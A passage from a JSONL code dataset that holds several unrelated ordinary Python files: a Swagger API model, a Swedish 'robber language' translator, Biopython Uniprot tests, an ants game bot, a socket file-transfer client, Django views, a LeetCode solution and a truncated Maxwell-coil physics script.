\"\"\"\n return self._preview_vendor_hash\n\n @preview_vendor_hash.setter\n def preview_vendor_hash(self, preview_vendor_hash):\n \"\"\"Sets the preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n If the preview data is derived from a fake \\\"Preview\\\" Vendor, this will be the hash identifier for the DestinyVendorDefinition of that fake vendor. # noqa: E501\n\n :param preview_vendor_hash: The preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: int\n \"\"\"\n\n self._preview_vendor_hash = preview_vendor_hash\n\n @property\n def preview_action_string(self):\n \"\"\"Gets the preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n If the preview has an associated action (like \\\"Open\\\"), this will be the localized string for that action. # noqa: E501\n\n :return: The preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :rtype: str\n \"\"\"\n return self._preview_action_string\n\n @preview_action_string.setter\n def preview_action_string(self, preview_action_string):\n \"\"\"Sets the preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n If the preview has an associated action (like \\\"Open\\\"), this will be the localized string for that action. # noqa: E501\n\n :param preview_action_string: The preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: str\n \"\"\"\n\n self._preview_action_string = preview_action_string\n\n @property\n def derived_item_categories(self):\n \"\"\"Gets the derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n This is a list of the items being previewed, categorized in the same way as they are in the preview UI. # noqa: E501\n\n :return: The derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :rtype: list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]\n \"\"\"\n return self._derived_item_categories\n\n @derived_item_categories.setter\n def derived_item_categories(self, derived_item_categories):\n \"\"\"Sets the derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n This is a list of the items being previewed, categorized in the same way as they are in the preview UI. # noqa: E501\n\n :param derived_item_categories: The derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]\n \"\"\"\n\n self._derived_item_categories = derived_item_categories\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DestinyDefinitionsDestinyItemPreviewBlockDefinition):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"python/swagger_client/models/destiny_definitions_destiny_item_preview_block_definition.py","file_name":"destiny_definitions_destiny_item_preview_block_definition.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"375562626","text":"from gtts import gTTS\r\n\r\nimport os\r\n\r\n# Alla vokaler\r\nvowels = 'aouåeiyäö'\r\n\r\n# Mina frågor ligger i dictionarys\r\nquestion = [('Vill du kryptera eller dekryptera(K eller D)?\\n', 'k', 'd')]\r\nquestion2 = [('Vill du få det uppläst, ja eller nej(J eller N)?\\n', 'j', 'n')]\r\n\r\n# Här får man välja om man vill ha till eller från rövarstråket och vad man vill översätta\r\ndef main() -> None:\r\n for i in question:\r\n answer = str(input(i[0]))\r\n if answer.lower() == i[1]:\r\n word = input('Vad vill du översätta?\\n')\r\n final_word = rövarspråket(word)\r\n print(final_word)\r\n text_to_speech(final_word)\r\n elif answer.lower() == i[2]:\r\n word = input('Vad vill du översätta?\\n')\r\n final_word = decode_rövarspråket(word)\r\n print(final_word) \r\n text_to_speech(final_word)\r\n else:\r\n print('404 error')\r\n\r\n# Kollar om det finns vokaler\r\ndef is_vowel(letter: str) -> bool:\r\n return letter.lower() in vowels\r\n\r\n# Gör om svenska till rövarspråket\r\ndef rövarspråket(text: str) -> str:\r\n translation = ''\r\n for letter in text:\r\n if letter in 'qwrtpsdfghjklzxcvbnmQWRTPSDFGHJKLZXCVBNM':\r\n translation = translation + letter + 'o' + letter\r\n else:\r\n translation = translation + letter\r\n return translation\r\n\r\n# Gör om rövarspråket till svenska\r\ndef decode_rövarspråket(word: str) -> str:\r\n original_word = []\r\n i = 0\r\n while i <= (len(word) - 1):\r\n character = word[i]\r\n original_word.append(character)\r\n if character.isalpha() and not is_vowel(character):\r\n i += 3\r\n else:\r\n i += 1\r\n return ''.join(original_word)\r\n\r\n# Läser upp det som är översätt\r\ndef text_to_speech(text):\r\n for i in question2:\r\n answer = str(input(i[0]))\r\n if answer.lower() == i[1]:\r\n language = 'sv'\r\n myobj = gTTS(text=phrase, lang=language, slow=False)\r\n myobj.save(\"rövarspråket.mp3\")\r\n os.system(\"rövarspråket.mp3\")\r\n elif (answer.lower() == i[2]):\r\n print(text)\r\n else:\r\n print('404 error')\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"003rövarspråket_encrypt_decrypt.py","file_name":"003rövarspråket_encrypt_decrypt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"485444781","text":"#!/usr/bin/env python\n\"\"\"Test for the Uniprot parser on Uniprot XML files.\n\"\"\"\nimport os\nimport copy\nimport unittest\n\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\n\n#Left as None if the import within UniProtIO fails\nif SeqIO.UniprotIO.ElementTree is None:\n from Bio import MissingPythonDependencyError\n raise MissingPythonDependencyError(\"No ElementTree module was found. \"\n \"Use Python 2.5+, lxml or elementtree if you \"\n \"want to use Bio.SeqIO.UniprotIO.\")\n\nfrom seq_tests_common import compare_reference, compare_record\n\nclass TestUniprot(unittest.TestCase):\n\n def test_uni001(self):\n \"Parsing Uniprot file uni001\"\n filename = 'uni001'\n # test the record parser\n\n datafile = os.path.join('SwissProt', filename)\n\n test_handle = open(datafile)\n seq_record = SeqIO.read(test_handle, \"uniprot-xml\")\n test_handle.close()\n\n self.assertTrue(isinstance(seq_record, SeqRecord))\n\n # test a couple of things on the record -- this is not exhaustive\n self.assertEqual(seq_record.id, \"Q91G55\")\n self.assertEqual(seq_record.name, \"043L_IIV6\")\n self.assertEqual(seq_record.description, \"Uncharacterized protein 043L\")\n self.assertEqual(repr(seq_record.seq), \"Seq('MDLINNKLNIEIQKFCLDLEKKYNINYNNLIDLWFNKESTERLIKCEVNLENKI...IPI', ProteinAlphabet())\")\n\n # self.assertEqual(seq_record.accessions, ['Q91G55']) #seq_record.accessions does not exist\n # self.assertEqual(seq_record.organism_classification, ['Eukaryota', 'Metazoa', 'Chordata', 'Craniata', 'Vertebrata', 'Mammalia', 'Eutheria', 'Primates', 'Catarrhini', 'Hominidae', 'Homo'])\n # self.assertEqual(record.seqinfo, (348, 39676, '75818910'))\n \n self.assertEqual(len(seq_record.features), 1) \n self.assertEqual(repr(seq_record.features[0]), \"SeqFeature(FeatureLocation(ExactPosition(0), ExactPosition(116)), type='chain', id='PRO_0000377969')\")\n\n self.assertEqual(len(seq_record.annotations['references']), 2)\n self.assertEqual(seq_record.annotations['references'][0].authors, 'Jakob N.J., Mueller K., Bahr U., Darai G.')\n self.assertEqual(seq_record.annotations['references'][0].title, 'Analysis of the first complete DNA sequence of an invertebrate iridovirus: coding strategy of the genome of Chilo iridescent virus.')\n self.assertEqual(seq_record.annotations['references'][0].journal, 'Virology 286:182-196(2001)')\n self.assertEqual(seq_record.annotations['references'][0].comment, 'journal article | 2001 | Scope: NUCLEOTIDE SEQUENCE [LARGE SCALE GENOMIC DNA] | ')\n\n self.assertEqual(len(seq_record.dbxrefs), 11)\n self.assertEqual(seq_record.dbxrefs[0], 'DOI:10.1006/viro.2001.0963')\n\n self.assertEqual(seq_record.annotations['sequence_length'], 116)\n self.assertEqual(seq_record.annotations['sequence_checksum'], '4A29B35FB716523C')\n self.assertEqual(seq_record.annotations['modified'], '2009-07-07')\n self.assertEqual(seq_record.annotations['accessions'], ['Q91G55'])\n self.assertEqual(seq_record.annotations['taxonomy'], ['Viruses', 'dsDNA viruses, no RNA stage', 'Iridoviridae', 'Iridovirus'])\n self.assertEqual(seq_record.annotations['sequence_mass'], 13673)\n self.assertEqual(seq_record.annotations['dataset'], 'Swiss-Prot')\n self.assertEqual(seq_record.annotations['gene_name_ORF'], ['IIV6-043L'])\n self.assertEqual(seq_record.annotations['version'], 21)\n self.assertEqual(seq_record.annotations['sequence_modified'], '2001-12-01')\n self.assertEqual(seq_record.annotations['keywords'], ['Complete proteome', 'Virus reference strain'])\n self.assertEqual(seq_record.annotations['organism_host'], ['Acheta domesticus', 'House cricket', 'Chilo suppressalis', 'striped riceborer', 'Gryllus bimaculatus', 'Two-spotted cricket', 'Gryllus campestris', 'Spodoptera frugiperda', 'Fall armyworm'])\n self.assertEqual(seq_record.annotations['created'], '2009-06-16')\n self.assertEqual(seq_record.annotations['organism_name'], ['Chilo iridescent virus'])\n self.assertEqual(seq_record.annotations['organism'], 'Invertebrate iridescent virus 6 (IIV-6)')\n self.assertEqual(seq_record.annotations['recommendedName_fullName'], ['Uncharacterized protein 043L'])\n self.assertEqual(seq_record.annotations['sequence_version'], 1)\n self.assertEqual(seq_record.annotations['proteinExistence'], ['Predicted'])\n\n def compare_txt_xml(self, old, new):\n self.assertEqual(old.id, new.id)\n self.assertEqual(old.name, new.name)\n self.assertEqual(len(old), len(new))\n self.assertEqual(str(old.seq), str(new.seq))\n for key in set(old.annotations).intersection(new.annotations):\n if key == \"references\":\n self.assertEqual(len(old.annotations[key]),\n len(new.annotations[key]))\n for r1, r2 in zip(old.annotations[key], new.annotations[key]):\n #Tweak for line breaks in plain text SwissProt\n r1.title = r1.title.replace(\"- \", \"-\")\n r2.title = r2.title.replace(\"- \", \"-\")\n r1.journal = r1.journal.rstrip(\".\") #Should parser do this?\n r1.medline_id = \"\" #Missing in UniPort MXL? TODO - check\n #Lots of extra comments in UniProt XML\n r1.comment = \"\"\n r2.comment = \"\"\n if not r2.journal: r1.journal = \"\"\n compare_reference(r1, r2)\n elif old.annotations[key] == new.annotations[key]:\n pass\n elif key in [\"date\"]:\n #TODO - Why is this a list vs str?\n pass\n elif type(old.annotations[key]) != type(new.annotations[key]):\n raise TypeError(\"%s gives %s vs %s\" % \\\n (key, old.annotations[key], new.annotations[key]))\n elif key in [\"organism\"]:\n if old.annotations[key] == new.annotations[key]:\n pass\n elif old.annotations[key].startswith(new.annotations[key]+\" \"):\n pass\n else:\n raise ValueError(key)\n elif isinstance(old.annotations[key], list) \\\n and sorted(old.annotations[key]) == sorted(new.annotations[key]):\n pass\n else:\n raise ValueError(\"%s gives %s vs %s\" % \\\n (key, old.annotations[key], new.annotations[key]))\n self.assertEqual(len(old.features), len(new.features),\n \"Features in %s, %i vs %i\" %\n (old.id, len(old.features), len(new.features)))\n for f1, f2 in zip(old.features, new.features):\n \"\"\"\n self.assertEqual(f1.location.nofuzzy_start, f2.location.nofuzzy_start,\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n self.assertEqual(f1.location.nofuzzy_end, f2.location.nofuzzy_end,\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n \"\"\"\n self.assertEqual(repr(f1.location), repr(f2.location),\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n\n def test_Q13639(self):\n \"\"\"Compare SwissProt text and uniprot XML versions of Q13639.\"\"\"\n old = SeqIO.read(\"SwissProt/Q13639.txt\", \"swiss\")\n new = SeqIO.read(\"SwissProt/Q13639.xml\", \"uniprot-xml\")\n self.compare_txt_xml(old, new)\n \n def test_multi_ex(self):\n \"\"\"Compare SwissProt text and uniprot XML versions of several examples.\"\"\"\n txt_list = list(SeqIO.parse(\"SwissProt/multi_ex.txt\", \"swiss\"))\n xml_list = list(SeqIO.parse(\"SwissProt/multi_ex.xml\", \"uniprot-xml\"))\n fas_list = list(SeqIO.parse(\"SwissProt/multi_ex.fasta\", \"fasta\"))\n ids = [x.strip() for x in open(\"SwissProt/multi_ex.list\")]\n self.assertEqual(len(txt_list), len(ids))\n self.assertEqual(len(txt_list), len(fas_list))\n self.assertEqual(len(txt_list), len(xml_list))\n for txt, xml, fas, id in zip(txt_list, xml_list, fas_list, ids):\n self.assertEqual(txt.id, id)\n self.assertTrue(txt.id in fas.id.split(\"|\"))\n self.assertEqual(str(txt.seq), str(fas.seq))\n self.compare_txt_xml(txt, xml)\n \n def test_multi_ex_index(self):\n \"\"\"Index SwissProt text and uniprot XML versions of several examples.\"\"\"\n txt_list = list(SeqIO.parse(\"SwissProt/multi_ex.txt\", \"swiss\"))\n xml_list = list(SeqIO.parse(\"SwissProt/multi_ex.xml\", \"uniprot-xml\"))\n ids = [x.strip() for x in open(\"SwissProt/multi_ex.list\")]\n txt_index = SeqIO.index(\"SwissProt/multi_ex.txt\", \"swiss\")\n xml_index = SeqIO.index(\"SwissProt/multi_ex.xml\", \"uniprot-xml\")\n self.assertEqual(sorted(txt_index), sorted(ids))\n self.assertEqual(sorted(xml_index), sorted(ids))\n #Check SeqIO.parse() versus SeqIO.index() for plain text \"swiss\"\n for old in txt_list:\n new = txt_index[old.id]\n compare_record(old, new)\n #Check SeqIO.parse() versus SeqIO.index() for XML \"uniprot-xml\"\n for old in xml_list:\n new = xml_index[old.id]\n compare_record(old, new)\n \nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity = 2)\n unittest.main(testRunner=runner)\n","sub_path":"Tests/test_Uniprot.py","file_name":"test_Uniprot.py","file_ext":"py","file_size_in_byte":9688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"409463325","text":"#!/usr/bin/env python\nfrom ants import *\nfrom bucket import *\n\n# A class that stores most of the game infomation\nclass game_state():\n # Setup the class\n\tdef __init__(self, ants, logger):\n\t\t# Setup share variables\n\t\tself.ants = ants\n\t\tself.logger = logger\n\t\tself.turn = 0\t\n\t\t\n\t\t# Setup my ant variables\n\t\tself.my_ants = set()\n\t\tself.movable = set()\n\t\tself.num_my_ants = 0\t\t\n\t\tself.remove_ant = set()\n\t\tself.my_hills = set()\n\t\t\n\t\t# Setup enemy ant variables\n\t\tself.enemy_ants = [set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set()]\n\t\tself.enemy_hills = [set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set()]\n\t\tself.num_enemy_ants = 0\n\t\t\n\t\t# Setup path variables\n\t\tself.paths = []\n\t\t\n\t\t# Setup food variables\n\t\tself.food = set()\n\t\tself.targets = set()\n\t\t\n\t\t# Setup bucket map \n\t\tself.size = 8\n\t\tself.bucket_rows = int(self.ants.rows / self.size)\n\t\tself.bucket_cols = int(self.ants.cols / self.size)\n\n\t\tself.bucket_map = [ [ bucket(self.size) ] * (self.bucket_rows + 1) for i in range(self.bucket_cols + 1)]\n\t\t\n\t\t# Empty the buckets\n\t\tfor col in range(self.bucket_cols):\n\t\t\tfor row in range(self.bucket_rows):\n\t\t\t\tself.bucket_map[col][row] = bucket(self.size)\n\t\t\n\t# Update the bucket map\n\tdef update_bucket(self):\n\t\t# Empty the buckets\n\t\tfor col in range(self.bucket_cols):\n\t\t\tfor row in range(self.bucket_rows):\n\t\t\t\tself.bucket_map[col][row].reset()\n\t\t\t\t\n\t\t# Update my ants\n\t\tfor ant_loc in self.my_ants:\n\t\t\trow, col = ant_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].my_ants.add(ant_loc)\n\t\t\t\n\t\t# Update enemy ants\n\t\tfor ant_loc in self.enemy_ants[0]:\n\t\t\trow, col = ant_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].enemy_ants.add(ant_loc)\n\t\t\t\n\t\t# Update food\n\t\tfor food_loc in self.food:\n\t\t\trow, col = food_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].food.add(food_loc)\n\t\t\n\t\t#self.logger.debug(\"Mini map cols: %d rows: %d\", self.bucket_cols, self.bucket_rows) \n\t\t#self.logger.debug(\"my density map:\\n%s\", self.render_my_density())\n\t\t#self.logger.debug(\"enemy density map:\\n%s\", self.render_enemy_density())\n\t\t#self.logger.debug(\"food density:\\n%s\", self.render_food_density())\n\t\t\n\t# Do the start up collection of data\n\tdef start_turn(self):\n\t\t# Increment turn number\n\t\tself.turn = self.turn + 1\n\t\t\n\t\t# Update my current info\n\t\tself.my_ants = set(self.ants.my_ants())\n\t\tself.movable = self.my_ants.copy()\n\t\tself.num_my_ants = len(self.my_ants)\n\t\tself.my_hills = set(self.ants.my_hills())\n\t\tself.remove_ant.clear()\n\t\t\n\t\t# Update enemy ant info\n\t\tenemy_ants = self.ants.enemy_ants()\n\t\tenemy_hills = self.ants.enemy_hills()\n\t\tself.num_enemy_ants = 0\n\t\t\n\t\t# Clear enemy ants\n\t\tfor ant_set in self.enemy_ants:\n\t\t\tant_set.clear()\n\t\t\t\n\t\t# Clear hills by testing if old hills are visible\n\t\tremove_hills = set()\n\t\tfor index in range(len(self.enemy_hills)):\n\t\t\tremove_hills.clear()\n\t\t\tfor hill in self.enemy_hills[index]:\n\t\t\t\n\t\t\t\t# If the hill is visible test if it still exist\n\t\t\t\tif self.ants.visible(hill):\n\t\t\t\t\n\t\t\t\t\t# Look for the hill in the updated list\n\t\t\t\t\tfound = False\n\t\t\t\t\tfor loc, owner in enemy_hills:\n\t\t\t\t\t\tif loc == hill:\n\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t# If the hill doesn't exist then the hill has been razed\n\t\t\t\t\tif not found:\n\t\t\t\t\t\tremove_hills.add(hill)\n\t\t\t# Update the hill list\n\t\t\tif remove_hills:\n\t\t\t\t#self.logger.debug(\"remove_hills list%s\", remove_hills)\n\t\t\t\tself.enemy_hills[index] = self.enemy_hills[index] - remove_hills\n\t\t\n\t\tfor loc, owner in enemy_ants:\n\t\t\tself.num_enemy_ants += 1\n\t\t\tself.enemy_ants[owner].add(loc)\n\t\t\tself.enemy_ants[0].add(loc)\n\t\t\n\t\tfor loc, owner in enemy_hills:\n\t\t\tself.enemy_hills[owner].add(loc)\n\t\t\tself.enemy_hills[0].add(loc)\n\t\t\n\t\t# Update the food info\n\t\tself.food = set(self.ants.food())\n\t\tself.targets.clear()\n\t\t\n\t\t# Log turn stats\n\t\t#self.logger.debug(\"----------------------------Do Turn %d----------------------------\", self.turn)\n\t\t#self.logger.debug(\"ant food %s\", self.food)\n\t\t#self.logger.debug(\"my ants (%d): %s\", self.num_my_ants, self.my_ants)\n\t\t#self.logger.debug(\"enemy ants (%d): %s\", self.num_enemy_ants, self.enemy_ants)\n\t\t#self.logger.debug(\"my hills: %s\", self.my_hills)\n\t\t#self.logger.debug(\"enemy hills: %s\", self.enemy_hills)\n\t\t#self.logger.debug(\"map:\\n%s\", self.ants.render_text_map())\n\t\t#self.logger.debug(\"path map:\\n%s\", self.render_paths())\n\t\t\n\t\tself.update_bucket()\n\t\t\n\t# Render a text map of the paths\n\tdef render_paths(self):\n\t\t#Start with an empty\n\t\tpath_map = [ ['.'] * self.ants.rows for i in range(self.ants.cols)]\n\t\ttext_map = ''\n\t\t\n\t\t# Go through each path and each node\n\t\tx0 = y0 = x1 = y1 = 0\n\t\tfor current in self.paths:\n\t\t\tfor i in range(len(current.path)):\n\t\t\t\tif i == 0:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\t# Get the path delta\n\t\t\t\ty0, x0 = current.path[i-1]\n\t\t\t\ty1, x1 = current.path[i]\n\t\t\t\tdx = x0 - x1\n\t\t\t\tdy = y0 - y1\n\n\t\t\t\t# Draw the direction the path is going\n\t\t\t\tif dx == 0:\n\t\t\t\t\tif dy == -1 or dy > 1:\n\t\t\t\t\t\tpath_map[x0][y0] = 'v'\n\t\t\t\t\tif dy == 1 or dy < -1:\n\t\t\t\t\t\tpath_map[x0][y0] = '^'\n\t\t\t\telse:\n\t\t\t\t\tif dx == -1 or dx > 1:\n\t\t\t\t\t\tpath_map[x0][y0] = '>'\n\t\t\t\t\tif dx == 1 or dx < -1:\n\t\t\t\t\t\tpath_map[x0][y0] = '<'\n\t\t\t\n\t\t\t# X Marks the spot\n\t\t\tif not i == 0:\n\t\t\t\tpath_map[x1][y1] = 'X'\n\n\t\t# Render the map\n\t\tfor x in range(self.ants.rows):\n\t\t\tfor y in range(self.ants.cols):\n\t\t\t\ttext_map += path_map[y][x]\n\t\t\ttext_map += '\\n'\n\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of the paths\n\tdef render_my_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\t\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].my_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\t\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of the paths\n\tdef render_enemy_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].enemy_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\t\t\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of the paths\n\tdef render_food_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].food_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\t\t\t\t\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n","sub_path":"mybotV4/game_state.py","file_name":"game_state.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"415482771","text":"#!/usr/bin/env python\nimport socket\nimport hashlib\n\n\nHOST = 'localhost'\nPORT = 10000\n\n\ndef echo_client():\n ''' Echo Server 的 Client 端 '''\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((HOST, PORT))\n\n while True:\n # 接收用户输入数据并发送服务端\n data = input('input > ')\n\n # 设定退出条件\n if data == 'exit':\n break\n\n # 发送数据到服务端\n s.sendall(data.encode())\n\n # 接收服务端数据\n data = s.recv(1024)\n if not data:\n break\n else:\n print(data.decode('utf-8'))\n\n s.close()\n\ndef recv_file():\n '''\n 接受服务器文件\n :return:\n '''\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((HOST, PORT))\n while True:\n cmd = input(\">>:\").strip()\n if len(cmd) == 0: continue\n if cmd.startswith(\"exit\"):\n break\n if cmd.startswith(\"get\"):\n s.send(cmd.encode())\n # 接收文件大小\n server_response = s.recv(1024)\n print(server_response.decode())\n if server_response.decode()=='文件不存在':\n continue\n else:\n print(\"文件大小:\", server_response.decode())\n\n # 发送确认\n s.send(b\"ok\")\n\n file_size = int(server_response.decode())\n received_size = 0\n filename = cmd.split()[1]\n f = open(filename + \".new\", \"wb\")\n m = hashlib.md5()\n # received_data = b\"\"\n while received_size < file_size:\n buff = 0;\n # 只收取文件中的字符\n if file_size - received_size > 1024:\n buff = 1024\n else:\n buff = file_size - received_size\n # 接收数据\n cmd_res = s.recv(buff)\n # 每次收到的字节数\n received_size = received_size + len(cmd_res)\n\n m.update(cmd_res)\n # 将接收的数据写到文件中\n f.write(cmd_res)\n else:\n print(\"done\")\n f.close()\n new_file_md5 = m.hexdigest()\n\n server_file_md5 = s.recv(1024)\n print(\"server md5 is :\", server_file_md5)\n print(\"client md5 is :\", new_file_md5)\n s.close()\n\n\nif __name__ == '__main__':\n # echo_client()\n recv_file()","sub_path":"week02/echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"469580624","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.utils.translation import get_language\n\nimport django_browserid.views\nimport waffle\n\nfrom flicks.base import regions\nfrom flicks.base.util import redirect\nfrom flicks.users.forms import UserProfileForm\nfrom flicks.users.tasks import newsletter_subscribe\nfrom flicks.videos.models import Video, Vote\n\n\n@login_required\ndef profile(request):\n \"\"\"Display and process the profile creation form.\"\"\"\n form = UserProfileForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n profile = form.save(commit=False)\n profile.user = request.user\n profile.locale = get_language()\n profile.save()\n\n if form.cleaned_data['mailing_list_signup']:\n format = form.cleaned_data['mailing_list_format']\n newsletter_subscribe.delay(request.user.email,\n source_url=request.build_absolute_uri(),\n format=format)\n\n return redirect('flicks.videos.upload')\n\n return render(request, 'users/profile.html', {\n 'form': form,\n 'regions': regions,\n })\n\n\nclass Verify(django_browserid.views.Verify):\n def login_success(self, *args, **kwargs):\n \"\"\"\n Extend successful login to check if the user was attempting to vote for\n a video, and create the vote if they were.\n \"\"\"\n response = super(Verify, self).login_success(*args, **kwargs)\n if not waffle.flag_is_active(self.request, 'voting'):\n return response\n\n try:\n video_id = self.request.session['vote_video']\n video = Video.objects.get(id=video_id)\n Vote.objects.get_or_create(user=self.request.user, video=video)\n del self.request.session['vote_video']\n\n # Set cookie so the JavaScript knows they successfully voted.\n response.set_cookie('just_voted', '1', max_age=3600, httponly=False)\n except (Video.DoesNotExist, ValueError):\n # Avoid retrying on an invalid video.\n del self.request.session['vote_video']\n except KeyError:\n pass # Do nothing if the key never existed.\n\n return response\n\n def login_failure(self, *args, **kwargs):\n \"\"\"\n Extend login failure so that if login fails, the user's attempts to\n vote for a video are cancelled.\n \"\"\"\n try:\n del self.request.session['vote_video']\n except KeyError:\n pass\n\n return super(Verify, self).login_failure(*args, **kwargs)\n","sub_path":"flicks/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"343643535","text":"class Solution(object):\n def removeElement(self, nums, val):\n rm_index = []\n for i in xrange(len(nums)):\n if nums[i] == val:\n rm_index.append(i)\n last = len(nums) - 1\n for i in rm_index:\n while last >= 0 and nums[last] == val:\n last -= 1\n if last < 0:\n break\n nums[i] = nums[last]\n last -= 1\n return len(nums) - len(rm_index)\n","sub_path":"27/27.remove-element.232785867.Accepted.leetcode.py","file_name":"27.remove-element.232785867.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"158640509","text":"import oppumpmagres_funcs as func\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# got this number from Niv's report. Please double check the number\nN_A = 110 # number of turns in Maxwell Coil A\nN_B = 142 # '' B\nN_C = 110 # '' C\n\nx_A = 0.262 # distance to the plane of the coil B [unit: m]\nx_B = 0.0 # ''\nx_C = 0.262 # ''\n\nR_A = 0.591/2.0 # radius of the Maxwell coil A [unit: m]\nR_B = 0.784/2.0 # '' B\nR_C = 0.591/2.0 # '' C\n\nB_per_I_niv = 2.93e-4 #[unit T/A]\nB_per_I = func.BperI_maxwell(N_A, x_A, R_A, N_B, x_B, R_B, N_C, x_C, R_C) \n\nprint(\"B field per unit current according to Niv et al. is %f T/A.\" % (B_per_I_niv))\nprint(\"B field per unit current according to our calc is %f T/A.\" % (B_per_I))\nprint(\"the difference between the two value is %f T/A.\" % (B_per_I - B_per_I_niv))\n\nprint(\"Assume the ambient field of %f T.\" % (func.B_earth))\n\nB_ext_net_vec = np.vectorize(func.B_ext_net)\n\nI = np.arange(0, 